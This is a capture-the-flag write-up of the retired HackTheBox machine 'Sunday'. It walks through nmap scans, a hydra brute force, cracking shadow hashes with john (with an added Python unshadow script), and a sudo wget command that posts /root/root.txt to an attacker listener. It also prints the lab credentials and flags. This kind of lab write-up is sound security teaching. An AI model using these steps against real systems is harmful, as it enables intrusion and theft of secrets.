October 02, 2018

HackTheBox - Sunday

It’s been quite a long time since I posted anything here. Yesterday, I realised now’s the time… to brag about something. Lately, I’ve been testing my hacking skills on HackTheBox, so I thought, why not post a writeup for it. And here I am, welcoming you to my first writeup, for the retired machine Sunday. Before starting, I wanna tell you that though this machine is an easy one, you’ll learn a few new things. I’ll try to go through all the steps I took to root this machine & hope that you’ll enjoy reading it.


Target Information

IP Address : 10.10.10.76
OS Family : Solaris
Hostname : Sunday

Host Information

IP Address : 10.10.12.236
OS Family : Linux
Hostname : LocalHost

Now, our first step will be enumerating the services running on the machine.

Enumeration

I use Nmap for enumeration purposes. So, I loaded my terminal & started with

mkdir nmap
nmap -sV -sC -oA nmap/primary 10.10.10.76

Here,

  • -sV returns info related to the services & their version
  • -sC runs default nmap scripts
  • -oA saves output in all formats (XML, nmap, gnmap) in nmap/primary

Now, this scan result shows that there is a finger service running on the machine, which can be used to list information about users on it. Here, we got two usernames: sammy & sunny. Just in case no logged-in user is shown, there is a Metasploit module, auxiliary/scanner/finger/finger_users, that can be used for that purpose. In that case, just ignore the other users.

Still, we don’t see any port through which we can access the machine. So, I decided to run another Nmap scan, but instead of using the default scripts, we’ll do a TCP SYN scan across the full port range this time.

nmap -v -sV -sS -p0-65535 -T4 -Pn -oA nmap/secondary 10.10.10.76

Here,

  • -v scans in verbose mode
  • -sS does a TCP SYN scan
  • -p0-65535 scans all TCP ports
  • -T4 makes the scan faster using four threads
  • -oA saves output in all formats (XML, nmap, gnmap) in nmap/secondary

Voila!! That’s what I was talking about. We got SSH listening on port 22022.

Gaining Access

Now, we have to use this SSH port to gain access to the system, & this can be painful if you’re a noob, as we got two usernames & no password. Most of the folks out there will try to run an automated brute force against the SSH. And believe me, it’s a good move, but it can sometimes be time consuming. And I ain’t got that. After a few guesses, I eventually found a combination that worked.

username: sunny
password: sunday

Still, if you’re weak at guessing, you can always use hydra.

hydra -s 22022 -L username.txt -P rockyou.txt 10.10.10.76 -t 4 ssh

As you can see, I’m running hydra against port 22022 with the SSH protocol, using 4 threads, the username.txt file (which contains the usernames we found in the beginning) & the legendary rockyou.txt as the password dictionary.

Now, using these credentials, I’m going to log in via SSH. But when I tried to log in the usual way, the server gave me an error saying that no matching key exchange method was found. Still, I turned out to be smarter than the creator & logged in.

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p 22022

Now, I’m logged into the machine as sunny. But I’m unable to access the user flag in the user.txt file, so we need to pivot somehow to sammy. After some more enumeration, I found a shadow.backup file which contains the hashed passwords of some users & is an incomplete backup of /etc/shadow, as it doesn’t have the hash for root. I also noticed that I was able to view the contents of /etc/passwd. Now I needed to somehow crack the hash for sammy, so I copied the contents of both files & joined them in pwd.txt.

Then, I tried to crack it using john.

john pwd.txt --wordlist=rockyou.txt
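The join step above (passwd dump plus partial shadow backup into one file in the format john reads, with the hash in field 2 of each passwd line) is what John’s own unshadow utility does. Here is an added example, not from the original writeup, that performs that merge on constructed sample records and shows why only the accounts whose hashes survive in the backup become crackable; root, which is missing from the backup, and locked/no-password accounts are left out.

```python
# Constructed sample input (not copied from the box): the passwd dump lists
# more accounts than the partial shadow backup covers (root is missing).
PASSWD_SAMPLE = """root:x:0:0:Super-User:/root:/usr/bin/bash
sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
nobody:x:60001:60001:NFS Anonymous Access User:/:
"""
SHADOW_BACKUP_SAMPLE = """sunny:$5$saltsalt$CONSTRUCTEDHASH00000000000000000000000000000:17636::::::
sammy:$5$saltsalt$CONSTRUCTEDHASH11111111111111111111111111111:17636::::::
nobody:NP:6445::::::
"""

# Hash-field values that carry no crackable hash (Solaris uses NP for "no
# password"; '*' and '!' prefixes mark locked accounts on most Unixes).
NO_HASH = {"", "x", "NP"}


def parse_shadow(text):
    """Map username -> hash for shadow entries that actually carry a hash."""
    hashes = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or line.startswith("#"):
            continue
        user, pw = fields[0], fields[1]
        if pw in NO_HASH or pw[0] in "*!":
            continue  # locked or passwordless: nothing for john to work on
        hashes[user] = pw
    return hashes


def unshadow(passwd_text, shadow_text):
    """Return john-style lines: passwd records with the real hash in field 2.
    Accounts without a usable backup entry (root, nobody here) are dropped
    rather than emitted with a useless 'x', so the cracking job stays clean."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or fields[0] not in hashes:
            continue
        fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


if __name__ == "__main__":
    print("\n".join(unshadow(PASSWD_SAMPLE, SHADOW_BACKUP_SAMPLE)))
```

Writing the returned lines to pwd.txt gives exactly the input the john command above expects; a backup that exposed root’s hash too would simply produce one more line.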

Now, we got the following credentials.

username: sammy
password: cooldude!

Now we can log in via SSH using the above credentials.

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sammy@10.10.10.76 -p 22022

Now we can successfully get the user flag from the user.txt file.

Now we have to get the root flag.

Privilege Escalation

Now, as sammy, I wanted to know what commands I can run as root.

sudo -l

Turns out, I can run wget as root.

Now, I started a Netcat listener on my host on port 1234.

sudo nc -lvnp 1234

Then I ran wget as sammy, through sudo, to post the root flag from the root.txt file to my listener.

sudo wget --post-file=/root/root.txt 10.10.12.236:1234

And voila!! We got the root flag too.

Flags

User: a3d9498027ca5187ba1793943ee8a598
Root: fb40fab61d99d37536daeec0d97af9b8

My people are destroyed for lack of knowledge. –Hosea 4:6


And that’s it. Hope you didn’t get bored reading it. I’ll try to keep releasing writeups on machines as soon as they get retired. Goodbye!!